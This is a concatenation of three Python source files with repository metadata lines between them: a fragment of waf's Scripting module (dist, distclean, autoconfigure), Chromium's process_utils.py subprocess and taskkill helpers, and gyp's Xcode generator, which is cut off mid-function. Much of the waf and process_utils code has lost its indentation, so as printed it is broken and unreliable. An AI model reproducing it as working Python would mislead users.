:param file_path: absolute path representing the top-level wscript file
:type file_path: string
"""
Context.g_module = Context.load_module(file_path)
Context.g_module.root_path = file_path
# note: to register the module globally, use the following:
# sys.modules['wscript_main'] = g_module
def set_def(obj):
name = obj.__name__
		if name not in Context.g_module.__dict__:
setattr(Context.g_module, name, obj)
	for k in [update, dist, distclean, distcheck]:
set_def(k)
	# add dummy init, shutdown and options functions if they're not defined
	if 'init' not in Context.g_module.__dict__:
		Context.g_module.init = Utils.nada
	if 'shutdown' not in Context.g_module.__dict__:
		Context.g_module.shutdown = Utils.nada
	if 'options' not in Context.g_module.__dict__:
		Context.g_module.options = Utils.nada
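# Illustrative top-level wscript sketch (not part of waf itself). Thanks to
# the fallbacks bound above, 'init', 'shutdown' and 'options' may be omitted:
#
# APPNAME = 'demo'
# VERSION = '0.1'
#
# def configure(ctx):
#     ctx.load('compiler_c')
#
# def build(ctx):
#     ctx.program(source='main.c', target='demo')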
def parse_options():
"""
Parse the command-line options and initialize the logging system.
Called by :py:func:`waflib.Scripting.waf_entry_point` during the initialization.
"""
Context.create_context('options').execute()
if not Options.commands:
Options.commands = [default_cmd]
Options.commands = [x for x in Options.commands if x != 'options'] # issue 1076
# process some internal Waf options
Logs.verbose = Options.options.verbose
Logs.init_log()
if Options.options.zones:
Logs.zones = Options.options.zones.split(',')
if not Logs.verbose:
Logs.verbose = 1
elif Logs.verbose > 0:
Logs.zones = ['runner']
if Logs.verbose > 2:
Logs.zones = ['*']
def run_command(cmd_name):
"""
Execute a single command. Called by :py:func:`waflib.Scripting.run_commands`.
:param cmd_name: command to execute, like ``build``
:type cmd_name: string
"""
ctx = Context.create_context(cmd_name)
ctx.options = Options.options # provided for convenience
ctx.cmd = cmd_name
ctx.execute()
return ctx
def run_commands():
"""
Execute the commands that were given on the command-line, and the other options
Called by :py:func:`waflib.Scripting.waf_entry_point` during the initialization, and executed
after :py:func:`waflib.Scripting.parse_options`.
"""
parse_options()
run_command('init')
while Options.commands:
cmd_name = Options.commands.pop(0)
timer = Utils.Timer()
run_command(cmd_name)
if not Options.options.progress_bar:
elapsed = ' (%s)' % str(timer)
Logs.info('%r finished successfully%s' % (cmd_name, elapsed))
run_command('shutdown')
###########################################################################################
def _can_distclean(name):
# WARNING: this method may disappear anytime
for k in '.o .moc .exe'.split():
if name.endswith(k):
return True
return False
def distclean_dir(dirname):
"""
Distclean function called in the particular case when::
top == out
:param dirname: absolute path of the folder to clean
:type dirname: string
"""
for (root, dirs, files) in os.walk(dirname):
for f in files:
if _can_distclean(f):
fname = root + os.sep + f
try:
os.unlink(fname)
except:
Logs.warn('could not remove %r' % fname)
for x in [Context.DBFILE, 'config.log']:
try:
os.unlink(x)
except:
pass
try:
shutil.rmtree('c4che')
except:
pass
def distclean(ctx):
'''removes the build directory'''
lst = os.listdir('.')
for f in lst:
if f == Options.lockfile:
try:
proj = ConfigSet.ConfigSet(f)
except:
Logs.warn('could not read %r' % f)
continue
if proj['out_dir'] != proj['top_dir']:
try:
shutil.rmtree(proj['out_dir'])
except IOError:
pass
except OSError as e:
if e.errno != errno.ENOENT:
Logs.warn('project %r cannot be removed' % proj[Context.OUT])
else:
distclean_dir(proj['out_dir'])
for k in (proj['out_dir'], proj['top_dir'], proj['run_dir']):
try:
os.remove(os.path.join(k, Options.lockfile))
except OSError as e:
if e.errno != errno.ENOENT:
Logs.warn('file %r cannot be removed' % f)
# remove the local waf cache
if f.startswith('.waf') and not Options.commands:
shutil.rmtree(f, ignore_errors=True)
class Dist(Context.Context):
"""
Create an archive containing the project source code::
$ waf dist
"""
cmd = 'dist'
fun = 'dist'
algo = 'tar.bz2'
ext_algo = {}
def execute(self):
"""
See :py:func:`waflib.Context.Context.execute`
"""
self.recurse([os.path.dirname(Context.g_module.root_path)])
self.archive()
def archive(self):
"""
Create the archive.
"""
import tarfile
arch_name = self.get_arch_name()
try:
self.base_path
except:
self.base_path = self.path
node = self.base_path.make_node(arch_name)
try:
node.delete()
except:
pass
files = self.get_files()
if self.algo.startswith('tar.'):
tar = tarfile.open(arch_name, 'w:' + self.algo.replace('tar.', ''))
for x in files:
self.add_tar_file(x, tar)
tar.close()
elif self.algo == 'zip':
import zipfile
zip = zipfile.ZipFile(arch_name, 'w', compression=zipfile.ZIP_DEFLATED)
for x in files:
archive_name = self.get_base_name() + '/' + x.path_from(self.base_path)
zip.write(x.abspath(), archive_name, zipfile.ZIP_DEFLATED)
zip.close()
else:
self.fatal('Valid algo types are tar.bz2, tar.gz or zip')
try:
from hashlib import sha1 as sha
except ImportError:
from sha import sha
try:
digest = " (sha=%r)" % sha(node.read()).hexdigest()
except:
digest = ''
Logs.info('New archive created: %s%s' % (self.arch_name, digest))
def get_tar_path(self, node):
"""
		return the path to use for a node in the tar archive; the purpose of this
		is to let subclasses resolve symbolic links or to change file names
"""
return node.abspath()
def add_tar_file(self, x, tar):
"""
Add a file to the tar archive. Transform symlinks into files if the files lie out of the project tree.
"""
p = self.get_tar_path(x)
tinfo = tar.gettarinfo(name=p, arcname=self.get_tar_prefix() + '/' + x.path_from(self.base_path))
tinfo.uid = 0
tinfo.gid = 0
tinfo.uname = 'root'
tinfo.gname = 'root'
fu = None
try:
fu = open(p, 'rb')
tar.addfile(tinfo, fileobj=fu)
finally:
if fu:
fu.close()
def get_tar_prefix(self):
try:
return self.tar_prefix
except:
return self.get_base_name()
def get_arch_name(self):
"""
Return the name of the archive to create. Change the default value by setting *arch_name*::
def dist(ctx):
ctx.arch_name = 'ctx.tar.bz2'
:rtype: string
"""
try:
self.arch_name
except:
self.arch_name = self.get_base_name() + '.' + self.ext_algo.get(self.algo, self.algo)
return self.arch_name
def get_base_name(self):
"""
Return the default name of the main directory in the archive, which is set to *appname-version*.
Set the attribute *base_name* to change the default value::
def dist(ctx):
ctx.base_name = 'files'
:rtype: string
"""
try:
self.base_name
except:
appname = getattr(Context.g_module, Context.APPNAME, 'noname')
version = getattr(Context.g_module, Context.VERSION, '1.0')
self.base_name = appname + '-' + version
return self.base_name
def get_excl(self):
"""
Return the patterns to exclude for finding the files in the top-level directory. Set the attribute *excl*
to change the default value::
def dist(ctx):
ctx.excl = 'build **/*.o **/*.class'
:rtype: string
"""
try:
return self.excl
except:
self.excl = Node.exclude_regs + ' **/waf-1.6.* **/.waf-1.6* **/waf3-1.6.* **/.waf3-1.6* **/*~ **/*.rej **/*.orig **/*.pyc **/*.pyo **/*.bak **/*.swp **/.lock-w*'
nd = self.root.find_node(Context.out_dir)
if nd:
self.excl += ' ' + nd.path_from(self.base_path)
return self.excl
def get_files(self):
"""
The files to package are searched automatically by :py:func:`waflib.Node.Node.ant_glob`. Set
*files* to prevent this behaviour::
def dist(ctx):
ctx.files = ctx.path.find_node('wscript')
The files are searched from the directory 'base_path', to change it, set::
def dist(ctx):
ctx.base_path = path
:rtype: list of :py:class:`waflib.Node.Node`
"""
try:
files = self.files
except:
files = self.base_path.ant_glob('**/*', excl=self.get_excl())
return files
def dist(ctx):
'''makes a tarball for redistributing the sources'''
pass
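# Customization sketch (illustrative): a project's own dist() function can
# override the attributes read by the Dist class above, e.g.:
#
# def dist(ctx):
#     ctx.algo = 'zip'
#     ctx.excl = '**/.git **/*.pyc build'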
class DistCheck(Dist):
"""
Create an archive of the project, and try to build the project in a temporary directory::
$ waf distcheck
"""
fun = 'distcheck'
cmd = 'distcheck'
def execute(self):
"""
See :py:func:`waflib.Context.Context.execute`
"""
self.recurse([os.path.dirname(Context.g_module.root_path)])
self.archive()
self.check()
def check(self):
"""
Create the archive, uncompress it and try to build the project
"""
import tempfile, tarfile
t = None
try:
t = tarfile.open(self.get_arch_name())
for x in t:
t.extract(x)
finally:
if t:
t.close()
instdir = tempfile.mkdtemp('.inst', self.get_base_name())
ret = Utils.subprocess.Popen([sys.argv[0], 'configure', 'install', 'uninstall', '--destdir=' + instdir], cwd=self.get_base_name()).wait()
if ret:
raise Errors.WafError('distcheck failed with code %i' % ret)
if os.path.exists(instdir):
raise Errors.WafError('distcheck succeeded, but files were left in %s' % instdir)
shutil.rmtree(self.get_base_name())
def distcheck(ctx):
'''checks if the project compiles (tarball from 'dist')'''
pass
def update(ctx):
'''updates the plugins from the *waflib/extras* directory'''
lst = Options.options.files.split(',')
if not lst:
lst = [x for x in Utils.listdir(Context.waf_dir + '/waflib/extras') if x.endswith('.py')]
for x in lst:
tool = x.replace('.py', '')
try:
Configure.download_tool(tool, force=True, ctx=ctx)
except Errors.WafError:
Logs.error('Could not find the tool %s in the remote repository' % x)
def autoconfigure(execute_method):
"""
Decorator used to set the commands that can be configured automatically
"""
def execute(self):
if not Configure.autoconfig:
return execute_method(self)
env = ConfigSet.ConfigSet()
do_config = False
try:
env.load(os.path.join(Context.top_dir, Options.lockfile))
except Exception:
Logs.warn('Configuring the project')
do_config = True
else:
if env.run_dir != Context.run_dir:
do_config = True
else:
h = 0
for f in env['files']:
h = hash((h, Utils.readf(f, 'rb')))
do_config = h != env.hash
if do_config:
Options.commands.insert(0, self.cmd)
Options.commands.insert(0, 'configure')
return
return execute_method(self)
return execute
Build.BuildContext.execute = autoconfigure(Build.BuildContext.execute)
|
joone/chromium-crosswalk
|
refs/heads/2016.04.css-round-display-edtior-draft-1
|
tools/python/google/process_utils.py
|
186
|
# Copyright (c) 2006-2008 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Shared process-related utility functions."""
import errno
import os
import subprocess
import sys
class CommandNotFound(Exception): pass
TASKKILL = os.path.join(os.environ['WINDIR'], 'system32', 'taskkill.exe')
TASKKILL_PROCESS_NOT_FOUND_ERR = 128
# On Windows 2000 there is no taskkill.exe; we need to have pskill somewhere
# in the path.
PSKILL = 'pskill.exe'
PSKILL_PROCESS_NOT_FOUND_ERR = -1
def KillAll(executables):
"""Tries to kill all copies of each process in the processes list. Returns
an error if any running processes couldn't be killed.
"""
result = 0
if os.path.exists(TASKKILL):
command = [TASKKILL, '/f', '/im']
process_not_found_err = TASKKILL_PROCESS_NOT_FOUND_ERR
else:
command = [PSKILL, '/t']
process_not_found_err = PSKILL_PROCESS_NOT_FOUND_ERR
for name in executables:
new_error = RunCommand(command + [name])
# Ignore "process not found" error.
if new_error != 0 and new_error != process_not_found_err:
result = new_error
return result
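# Usage sketch (hypothetical executable names):
#   KillAll(['chrome.exe', 'test_shell.exe'])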
def RunCommandFull(command, verbose=True, collect_output=False,
print_output=True):
"""Runs the command list.
Prints the given command (which should be a list of one or more strings).
If specified, prints its stderr (and optionally stdout) to stdout,
line-buffered, converting line endings to CRLF (see note below). If
specified, collects the output as a list of lines and returns it. Waits
for the command to terminate and returns its status.
Args:
command: the full command to run, as a list of one or more strings
verbose: if True, combines all output (stdout and stderr) into stdout.
Otherwise, prints only the command's stderr to stdout.
collect_output: if True, collects the output of the command as a list of
lines and returns it
print_output: if True, prints the output of the command
Returns:
A tuple consisting of the process's exit status and output. If
collect_output is False, the output will be [].
Raises:
CommandNotFound if the command executable could not be found.
"""
print '\n' + subprocess.list2cmdline(command).replace('\\', '/') + '\n', ###
if verbose:
out = subprocess.PIPE
err = subprocess.STDOUT
else:
out = file(os.devnull, 'w')
err = subprocess.PIPE
try:
proc = subprocess.Popen(command, stdout=out, stderr=err, bufsize=1)
except OSError, e:
if e.errno == errno.ENOENT:
raise CommandNotFound('Unable to find "%s"' % command[0])
raise
output = []
if verbose:
read_from = proc.stdout
else:
read_from = proc.stderr
line = read_from.readline()
while line:
line = line.rstrip()
if collect_output:
output.append(line)
if print_output:
# Windows Python converts \n to \r\n automatically whenever it
# encounters it written to a text file (including stdout). The only
# way around it is to write to a binary file, which isn't feasible for
# stdout. So we end up with \r\n here even though we explicitly write
# \n. (We could write \r instead, which doesn't get converted to \r\n,
# but that's probably more troublesome for people trying to read the
# files.)
print line + '\n',
# Python on windows writes the buffer only when it reaches 4k. This is
# not fast enough for all purposes.
sys.stdout.flush()
line = read_from.readline()
# Make sure the process terminates.
proc.wait()
if not verbose:
out.close()
return (proc.returncode, output)
def RunCommand(command, verbose=True):
"""Runs the command list, printing its output and returning its exit status.
Prints the given command (which should be a list of one or more strings),
then runs it and prints its stderr (and optionally stdout) to stdout,
line-buffered, converting line endings to CRLF. Waits for the command to
terminate and returns its status.
Args:
command: the full command to run, as a list of one or more strings
verbose: if True, combines all output (stdout and stderr) into stdout.
Otherwise, prints only the command's stderr to stdout.
Returns:
The process's exit status.
Raises:
CommandNotFound if the command executable could not be found.
"""
return RunCommandFull(command, verbose)[0]
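# Usage sketch (hypothetical command lines):
#   status = RunCommand(['python', '--version'])
#   status, lines = RunCommandFull(['python', 'build.py'],
#                                  collect_output=True)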
def RunCommandsInParallel(commands, verbose=True, collect_output=False,
print_output=True):
"""Runs a list of commands in parallel, waits for all commands to terminate
  and returns their statuses. If specified, the output of commands can be
returned and/or printed.
Args:
commands: the list of commands to run, each as a list of one or more
strings.
verbose: if True, combines stdout and stderr into stdout.
Otherwise, prints only the command's stderr to stdout.
collect_output: if True, collects the output of the each command as a list
of lines and returns it.
print_output: if True, prints the output of each command.
Returns:
A list of tuples consisting of each command's exit status and output. If
collect_output is False, the output will be [].
Raises:
CommandNotFound if any of the command executables could not be found.
"""
command_num = len(commands)
outputs = [[] for i in xrange(command_num)]
procs = [None for i in xrange(command_num)]
eofs = [False for i in xrange(command_num)]
for command in commands:
print '\n' + subprocess.list2cmdline(command).replace('\\', '/') + '\n',
if verbose:
out = subprocess.PIPE
err = subprocess.STDOUT
else:
out = file(os.devnull, 'w')
err = subprocess.PIPE
for i in xrange(command_num):
try:
command = commands[i]
procs[i] = subprocess.Popen(command, stdout=out, stderr=err, bufsize=1)
except OSError, e:
if e.errno == errno.ENOENT:
raise CommandNotFound('Unable to find "%s"' % command[0])
raise
# We could consider terminating the processes already started.
# But Popen.kill() is only available in version 2.6.
# For now the clean up is done by KillAll.
while True:
eof_all = True
for i in xrange(command_num):
if eofs[i]:
continue
if verbose:
read_from = procs[i].stdout
else:
read_from = procs[i].stderr
line = read_from.readline()
if line:
eof_all = False
line = line.rstrip()
outputs[i].append(line)
if print_output:
# Windows Python converts \n to \r\n automatically whenever it
# encounters it written to a text file (including stdout). The only
# way around it is to write to a binary file, which isn't feasible
# for stdout. So we end up with \r\n here even though we explicitly
# write \n. (We could write \r instead, which doesn't get converted
# to \r\n, but that's probably more troublesome for people trying to
# read the files.)
print line + '\n',
else:
eofs[i] = True
if eof_all:
break
# Make sure the process terminates.
for i in xrange(command_num):
procs[i].wait()
if not verbose:
out.close()
return [(procs[i].returncode, outputs[i]) for i in xrange(command_num)]
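# Usage sketch (hypothetical commands): run two scripts side by side and
# collect each command's (status, output) pair.
#   results = RunCommandsInParallel([['python', 'a.py'], ['python', 'b.py']],
#                                   collect_output=True)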
|
sharaf84/digi
|
refs/heads/dev
|
shared/themes/frontend/node_modules/gulp-sass/node_modules/node-sass/node_modules/pangyp/gyp/pylib/gyp/generator/xcode.py
|
526
|
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import filecmp
import gyp.common
import gyp.xcodeproj_file
import errno
import os
import sys
import posixpath
import re
import shutil
import subprocess
import tempfile
# Project files generated by this module will use _intermediate_var as a
# custom Xcode setting whose value is a DerivedSources-like directory that's
# project-specific and configuration-specific. The normal choice,
# DERIVED_FILE_DIR, is target-specific, which is thought to be too restrictive
# as it is likely that multiple targets within a single project file will want
# to access the same set of generated files. The other option,
# PROJECT_DERIVED_FILE_DIR, is unsuitable because while it is project-specific,
# it is not configuration-specific. INTERMEDIATE_DIR is defined as
# $(PROJECT_DERIVED_FILE_DIR)/$(CONFIGURATION).
_intermediate_var = 'INTERMEDIATE_DIR'
# SHARED_INTERMEDIATE_DIR is the same, except that it is shared among all
# targets that share the same BUILT_PRODUCTS_DIR.
_shared_intermediate_var = 'SHARED_INTERMEDIATE_DIR'
_library_search_paths_var = 'LIBRARY_SEARCH_PATHS'
generator_default_variables = {
'EXECUTABLE_PREFIX': '',
'EXECUTABLE_SUFFIX': '',
'STATIC_LIB_PREFIX': 'lib',
'SHARED_LIB_PREFIX': 'lib',
'STATIC_LIB_SUFFIX': '.a',
'SHARED_LIB_SUFFIX': '.dylib',
# INTERMEDIATE_DIR is a place for targets to build up intermediate products.
# It is specific to each build environment. It is only guaranteed to exist
# and be constant within the context of a project, corresponding to a single
# input file. Some build environments may allow their intermediate directory
# to be shared on a wider scale, but this is not guaranteed.
'INTERMEDIATE_DIR': '$(%s)' % _intermediate_var,
'OS': 'mac',
'PRODUCT_DIR': '$(BUILT_PRODUCTS_DIR)',
'LIB_DIR': '$(BUILT_PRODUCTS_DIR)',
'RULE_INPUT_ROOT': '$(INPUT_FILE_BASE)',
'RULE_INPUT_EXT': '$(INPUT_FILE_SUFFIX)',
'RULE_INPUT_NAME': '$(INPUT_FILE_NAME)',
'RULE_INPUT_PATH': '$(INPUT_FILE_PATH)',
'RULE_INPUT_DIRNAME': '$(INPUT_FILE_DIRNAME)',
'SHARED_INTERMEDIATE_DIR': '$(%s)' % _shared_intermediate_var,
'CONFIGURATION_NAME': '$(CONFIGURATION)',
}
# The Xcode-specific sections that hold paths.
generator_additional_path_sections = [
'mac_bundle_resources',
'mac_framework_headers',
'mac_framework_private_headers',
# 'mac_framework_dirs', input already handles _dirs endings.
]
# The Xcode-specific keys that exist on targets and aren't moved down to
# configurations.
generator_additional_non_configuration_keys = [
'mac_bundle',
'mac_bundle_resources',
'mac_framework_headers',
'mac_framework_private_headers',
'mac_xctest_bundle',
'xcode_create_dependents_test_runner',
]
# We want to let any rules apply to files that are resources also.
generator_extra_sources_for_rules = [
'mac_bundle_resources',
'mac_framework_headers',
'mac_framework_private_headers',
]
# Xcode's standard set of library directories, which don't need to be duplicated
# in LIBRARY_SEARCH_PATHS. This list is not exhaustive, but that's okay.
xcode_standard_library_dirs = frozenset([
'$(SDKROOT)/usr/lib',
'$(SDKROOT)/usr/local/lib',
])
def CreateXCConfigurationList(configuration_names):
xccl = gyp.xcodeproj_file.XCConfigurationList({'buildConfigurations': []})
if len(configuration_names) == 0:
configuration_names = ['Default']
for configuration_name in configuration_names:
xcbc = gyp.xcodeproj_file.XCBuildConfiguration({
'name': configuration_name})
xccl.AppendProperty('buildConfigurations', xcbc)
xccl.SetProperty('defaultConfigurationName', configuration_names[0])
return xccl
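# Example (illustrative): CreateXCConfigurationList(['Debug', 'Release'])
# returns an XCConfigurationList holding both configurations, with 'Debug'
# (the first name) as defaultConfigurationName.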
class XcodeProject(object):
def __init__(self, gyp_path, path, build_file_dict):
self.gyp_path = gyp_path
self.path = path
self.project = gyp.xcodeproj_file.PBXProject(path=path)
projectDirPath = gyp.common.RelativePath(
os.path.dirname(os.path.abspath(self.gyp_path)),
os.path.dirname(path) or '.')
self.project.SetProperty('projectDirPath', projectDirPath)
self.project_file = \
gyp.xcodeproj_file.XCProjectFile({'rootObject': self.project})
self.build_file_dict = build_file_dict
# TODO(mark): add destructor that cleans up self.path if created_dir is
# True and things didn't complete successfully. Or do something even
# better with "try"?
self.created_dir = False
try:
os.makedirs(self.path)
self.created_dir = True
except OSError, e:
if e.errno != errno.EEXIST:
raise
def Finalize1(self, xcode_targets, serialize_all_tests):
# Collect a list of all of the build configuration names used by the
# various targets in the file. It is very heavily advised to keep each
# target in an entire project (even across multiple project files) using
# the same set of configuration names.
configurations = []
for xct in self.project.GetProperty('targets'):
xccl = xct.GetProperty('buildConfigurationList')
xcbcs = xccl.GetProperty('buildConfigurations')
for xcbc in xcbcs:
name = xcbc.GetProperty('name')
if name not in configurations:
configurations.append(name)
# Replace the XCConfigurationList attached to the PBXProject object with
# a new one specifying all of the configuration names used by the various
# targets.
try:
xccl = CreateXCConfigurationList(configurations)
self.project.SetProperty('buildConfigurationList', xccl)
except:
sys.stderr.write("Problem with gyp file %s\n" % self.gyp_path)
raise
# The need for this setting is explained above where _intermediate_var is
# defined. The comments below about wanting to avoid project-wide build
# settings apply here too, but this needs to be set on a project-wide basis
# so that files relative to the _intermediate_var setting can be displayed
# properly in the Xcode UI.
#
# Note that for configuration-relative files such as anything relative to
# _intermediate_var, for the purposes of UI tree view display, Xcode will
# only resolve the configuration name once, when the project file is
# opened. If the active build configuration is changed, the project file
# must be closed and reopened if it is desired for the tree view to update.
# This is filed as Apple radar 6588391.
xccl.SetBuildSetting(_intermediate_var,
'$(PROJECT_DERIVED_FILE_DIR)/$(CONFIGURATION)')
xccl.SetBuildSetting(_shared_intermediate_var,
'$(SYMROOT)/DerivedSources/$(CONFIGURATION)')
# Set user-specified project-wide build settings and config files. This
# is intended to be used very sparingly. Really, almost everything should
# go into target-specific build settings sections. The project-wide
# settings are only intended to be used in cases where Xcode attempts to
# resolve variable references in a project context as opposed to a target
# context, such as when resolving sourceTree references while building up
# the tree tree view for UI display.
# Any values set globally are applied to all configurations, then any
# per-configuration values are applied.
for xck, xcv in self.build_file_dict.get('xcode_settings', {}).iteritems():
xccl.SetBuildSetting(xck, xcv)
if 'xcode_config_file' in self.build_file_dict:
config_ref = self.project.AddOrGetFileInRootGroup(
self.build_file_dict['xcode_config_file'])
xccl.SetBaseConfiguration(config_ref)
build_file_configurations = self.build_file_dict.get('configurations', {})
if build_file_configurations:
for config_name in configurations:
build_file_configuration_named = \
build_file_configurations.get(config_name, {})
if build_file_configuration_named:
xcc = xccl.ConfigurationNamed(config_name)
for xck, xcv in build_file_configuration_named.get('xcode_settings',
{}).iteritems():
xcc.SetBuildSetting(xck, xcv)
if 'xcode_config_file' in build_file_configuration_named:
config_ref = self.project.AddOrGetFileInRootGroup(
build_file_configurations[config_name]['xcode_config_file'])
xcc.SetBaseConfiguration(config_ref)
# Sort the targets based on how they appeared in the input.
# TODO(mark): Like a lot of other things here, this assumes internal
# knowledge of PBXProject - in this case, of its "targets" property.
# ordinary_targets are ordinary targets that are already in the project
# file. run_test_targets are the targets that run unittests and should be
# used for the Run All Tests target. support_targets are the action/rule
# targets used by GYP file targets, just kept for the assert check.
ordinary_targets = []
run_test_targets = []
support_targets = []
# targets is full list of targets in the project.
targets = []
    # does it define its own "all"?
has_custom_all = False
# targets_for_all is the list of ordinary_targets that should be listed
# in this project's "All" target. It includes each non_runtest_target
# that does not have suppress_wildcard set.
targets_for_all = []
for target in self.build_file_dict['targets']:
target_name = target['target_name']
toolset = target['toolset']
qualified_target = gyp.common.QualifiedTarget(self.gyp_path, target_name,
toolset)
xcode_target = xcode_targets[qualified_target]
# Make sure that the target being added to the sorted list is already in
# the unsorted list.
assert xcode_target in self.project._properties['targets']
targets.append(xcode_target)
ordinary_targets.append(xcode_target)
if xcode_target.support_target:
support_targets.append(xcode_target.support_target)
targets.append(xcode_target.support_target)
if not int(target.get('suppress_wildcard', False)):
targets_for_all.append(xcode_target)
if target_name.lower() == 'all':
        has_custom_all = True
# If this target has a 'run_as' attribute, add its target to the
# targets, and add it to the test targets.
if target.get('run_as'):
# Make a target to run something. It should have one
# dependency, the parent xcode target.
xccl = CreateXCConfigurationList(configurations)
run_target = gyp.xcodeproj_file.PBXAggregateTarget({
'name': 'Run ' + target_name,
'productName': xcode_target.GetProperty('productName'),
'buildConfigurationList': xccl,
},
parent=self.project)
run_target.AddDependency(xcode_target)
command = target['run_as']
script = ''
if command.get('working_directory'):
script = script + 'cd "%s"\n' % \
gyp.xcodeproj_file.ConvertVariablesToShellSyntax(
command.get('working_directory'))
if command.get('environment'):
script = script + "\n".join(
['export %s="%s"' %
(key, gyp.xcodeproj_file.ConvertVariablesToShellSyntax(val))
for (key, val) in command.get('environment').iteritems()]) + "\n"
        # Some tests end up using sockets, files on disk, etc. and can get
        # confused if more than one test runs at a time.  The generator
        # flag 'xcode_serialize_all_test_runs' controls whether all tests
        # are forced to run serially.  It defaults to True.  To get serial
        # runs, this little bit of Python does the same as the Linux flock
        # utility to make sure only one runs at a time.
command_prefix = ''
if serialize_all_tests:
command_prefix = \
"""python -c "import fcntl, subprocess, sys
file = open('$TMPDIR/GYP_serialize_test_runs', 'a')
fcntl.flock(file.fileno(), fcntl.LOCK_EX)
sys.exit(subprocess.call(sys.argv[1:]))" """
# If we were unable to exec for some reason, we want to exit
# with an error, and fixup variable references to be shell
# syntax instead of xcode syntax.
script = script + 'exec ' + command_prefix + '%s\nexit 1\n' % \
gyp.xcodeproj_file.ConvertVariablesToShellSyntax(
gyp.common.EncodePOSIXShellList(command.get('action')))
ssbp = gyp.xcodeproj_file.PBXShellScriptBuildPhase({
'shellScript': script,
'showEnvVarsInLog': 0,
})
run_target.AppendProperty('buildPhases', ssbp)
# Add the run target to the project file.
targets.append(run_target)
run_test_targets.append(run_target)
xcode_target.test_runner = run_target
# Make sure that the list of targets being replaced is the same length as
# the one replacing it, but allow for the added test runner targets.
assert len(self.project._properties['targets']) == \
len(ordinary_targets) + len(support_targets)
self.project._properties['targets'] = targets
# Get rid of unnecessary levels of depth in groups like the Source group.
self.project.RootGroupsTakeOverOnlyChildren(True)
# Sort the groups nicely. Do this after sorting the targets, because the
# Products group is sorted based on the order of the targets.
self.project.SortGroups()
# Create an "All" target if there's more than one target in this project
# file and the project didn't define its own "All" target. Put a generated
# "All" target first so that people opening up the project for the first
# time will build everything by default.
if len(targets_for_all) > 1 and not has_custom_all:
xccl = CreateXCConfigurationList(configurations)
all_target = gyp.xcodeproj_file.PBXAggregateTarget(
{
'buildConfigurationList': xccl,
'name': 'All',
},
parent=self.project)
for target in targets_for_all:
all_target.AddDependency(target)
# TODO(mark): This is evil because it relies on internal knowledge of
# PBXProject._properties. It's important to get the "All" target first,
# though.
self.project._properties['targets'].insert(0, all_target)
# The same, but for run_test_targets.
if len(run_test_targets) > 1:
xccl = CreateXCConfigurationList(configurations)
run_all_tests_target = gyp.xcodeproj_file.PBXAggregateTarget(
{
'buildConfigurationList': xccl,
'name': 'Run All Tests',
},
parent=self.project)
for run_test_target in run_test_targets:
run_all_tests_target.AddDependency(run_test_target)
# Insert after the "All" target, which must exist if there is more than
# one run_test_target.
self.project._properties['targets'].insert(1, run_all_tests_target)
def Finalize2(self, xcode_targets, xcode_target_to_target_dict):
# Finalize2 needs to happen in a separate step because the process of
# updating references to other projects depends on the ordering of targets
# within remote project files. Finalize1 is responsible for sorting duty,
# and once all project files are sorted, Finalize2 can come in and update
# these references.
# To support making a "test runner" target that will run all the tests
# that are direct dependents of any given target, we look for
# xcode_create_dependents_test_runner being set on an Aggregate target,
# and generate a second target that will run the tests runners found under
# the marked target.
for bf_tgt in self.build_file_dict['targets']:
if int(bf_tgt.get('xcode_create_dependents_test_runner', 0)):
tgt_name = bf_tgt['target_name']
toolset = bf_tgt['toolset']
qualified_target = gyp.common.QualifiedTarget(self.gyp_path,
tgt_name, toolset)
xcode_target = xcode_targets[qualified_target]
if isinstance(xcode_target, gyp.xcodeproj_file.PBXAggregateTarget):
# Collect all the run test targets.
all_run_tests = []
pbxtds = xcode_target.GetProperty('dependencies')
for pbxtd in pbxtds:
pbxcip = pbxtd.GetProperty('targetProxy')
dependency_xct = pbxcip.GetProperty('remoteGlobalIDString')
if hasattr(dependency_xct, 'test_runner'):
all_run_tests.append(dependency_xct.test_runner)
# Directly depend on all the runners as they depend on the target
# that builds them.
if len(all_run_tests) > 0:
run_all_target = gyp.xcodeproj_file.PBXAggregateTarget({
'name': 'Run %s Tests' % tgt_name,
'productName': tgt_name,
},
parent=self.project)
for run_test_target in all_run_tests:
run_all_target.AddDependency(run_test_target)
# Insert the test runner after the related target.
idx = self.project._properties['targets'].index(xcode_target)
self.project._properties['targets'].insert(idx + 1, run_all_target)
# Update all references to other projects, to make sure that the lists of
# remote products are complete. Otherwise, Xcode will fill them in when
# it opens the project file, which will result in unnecessary diffs.
# TODO(mark): This is evil because it relies on internal knowledge of
# PBXProject._other_pbxprojects.
for other_pbxproject in self.project._other_pbxprojects.keys():
self.project.AddOrGetProjectReference(other_pbxproject)
self.project.SortRemoteProductReferences()
# Give everything an ID.
self.project_file.ComputeIDs()
# Make sure that no two objects in the project file have the same ID. If
# multiple objects wind up with the same ID, upon loading the file, Xcode
# will only recognize one object (the last one in the file?) and the
# results are unpredictable.
self.project_file.EnsureNoIDCollisions()
def Write(self):
# Write the project file to a temporary location first. Xcode watches for
# changes to the project file and presents a UI sheet offering to reload
# the project when it does change. However, in some cases, especially when
# multiple projects are open or when Xcode is busy, things don't work so
# seamlessly. Sometimes, Xcode is able to detect that a project file has
# changed but can't unload it because something else is referencing it.
# To mitigate this problem, and to avoid even having Xcode present the UI
# sheet when an open project is rewritten for inconsequential changes, the
# project file is written to a temporary file in the xcodeproj directory
# first. The new temporary file is then compared to the existing project
# file, if any. If they differ, the new file replaces the old; otherwise,
# the new project file is simply deleted. Xcode properly detects a file
# being renamed over an open project file as a change and so it remains
# able to present the "project file changed" sheet under this system.
# Writing to a temporary file first also avoids the possible problem of
# Xcode rereading an incomplete project file.
(output_fd, new_pbxproj_path) = \
tempfile.mkstemp(suffix='.tmp', prefix='project.pbxproj.gyp.',
dir=self.path)
try:
output_file = os.fdopen(output_fd, 'wb')
self.project_file.Print(output_file)
output_file.close()
pbxproj_path = os.path.join(self.path, 'project.pbxproj')
same = False
try:
same = filecmp.cmp(pbxproj_path, new_pbxproj_path, False)
except OSError, e:
if e.errno != errno.ENOENT:
raise
if same:
# The new file is identical to the old one, just get rid of the new
# one.
os.unlink(new_pbxproj_path)
else:
# The new file is different from the old one, or there is no old one.
# Rename the new file to the permanent name.
#
# tempfile.mkstemp uses an overly restrictive mode, resulting in a
# file that can only be read by the owner, regardless of the umask.
# There's no reason to not respect the umask here, which means that
# an extra hoop is required to fetch it and reset the new file's mode.
#
# No way to get the umask without setting a new one? Set a safe one
# and then set it back to the old value.
umask = os.umask(077)
